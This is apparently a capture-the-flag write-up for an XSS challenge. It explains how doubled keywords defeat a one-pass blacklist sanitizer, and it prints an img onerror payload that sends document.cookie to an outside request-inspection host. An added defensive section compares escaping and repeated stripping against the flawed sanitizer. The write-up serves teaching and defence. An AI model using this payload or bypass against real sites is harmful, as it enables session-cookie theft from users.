Fancy Page

Description

web/fancy-page (by hmmm) | 436 points

http://fancy-page.hsctf.com

Downloads: fancy-page.zip

Analysis

Fancy Page™ is a website that lets us write content and share it with others.

The website allows HTML tags, which means an XSS attack is possible.

There's also a share button ("Show us what you've created!"), which means that (most likely) we will need a cookie-stealing XSS.

display.js strips a few keywords that would otherwise be usable in XSS payloads.

function sanitize(content) {
	return content.replace(/script|on|iframe|object|embed|cookie/gi, "");
}

Sanitization happens only once, and the result goes straight into innerHTML:

let sanitized = sanitize(Arg("content"));
content.innerHTML = sanitized;

Solution

I used the Reflected Steal Cookie payload to create an XSS payload and beeceptor to inspect the incoming requests.

<img src=UwU oonnerror="this.src='https://klgrthio.free.beeceptor.com?'+document.coocookiekie; this.removeAttribute('oonnerror');">

oonnerror and similar tokens are written like this because when the sanitize function removes the blacklisted substring (on, cookie), what is left is onerror and document.cookie, which triggers the XSS.
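The following is an added example, not code from the challenge or from this writeup's author. It puts the single-pass blacklist from display.js next to two defensive alternatives, to show why a one-shot deletion of keywords is not a sanitizer: deleting "on" from a doubled token leaves the original token behind, repeating the deletion to a fixed point closes that particular gap but remains a blacklist, and escaping the markup instead of deleting substrings removes the problem entirely because innerHTML then renders the input as literal text. The sample input, the probe() placeholder, and the helper names are constructed for this example.

```javascript
// Added example (not the challenge's own code): comparing the challenge's
// single-pass blacklist with two defensive alternatives.
const BLACKLIST = /script|on|iframe|object|embed|cookie/gi;

// The challenge's sanitizer, as shown in display.js: one pass of deletion.
function sanitizeOnce(content) {
  return content.replace(BLACKLIST, "");
}

// Variant A: repeat the deletion until nothing changes. This closes the
// "oonnerror" gap, but it is still a blacklist: anything not listed passes
// through as raw markup, so it only narrows the problem.
function sanitizeToFixpoint(content) {
  let prev;
  do {
    prev = content;
    content = content.replace(BLACKLIST, "");
  } while (content !== prev);
  return content;
}

// Variant B: escape instead of delete. The markup characters can no longer
// be parsed as tags or attributes, so innerHTML shows the text verbatim.
function escapeHtml(content) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return content.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample input using the doubling trick from the writeup;
// probe() is a placeholder, not a real function.
const SAMPLE = '<img src=x oonnerror="probe()">';

// Detection helper: does the output still carry an on*= event handler?
function containsHandlerAttribute(markup) {
  return /\son\w+\s*=/i.test(markup);
}

// Run all three over the sample so the difference is visible side by side.
function compare(input) {
  return {
    once: sanitizeOnce(input),
    fixpoint: sanitizeToFixpoint(input),
    escaped: escapeHtml(input),
  };
}
```

containsHandlerAttribute(sanitizeOnce(SAMPLE)) is true: one pass turns "oonnerror" into "onerror". The fixed-point variant strips it down to a harmless "error" attribute, and the escaped output contains no "<" at all, so the browser never sees a tag to begin with. For a real application, an allowlist-based sanitizer library or inserting user content via textContent is the right choice; a blacklist regex, however many times it is applied, is not.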

Finally we share the URL and get the flag.
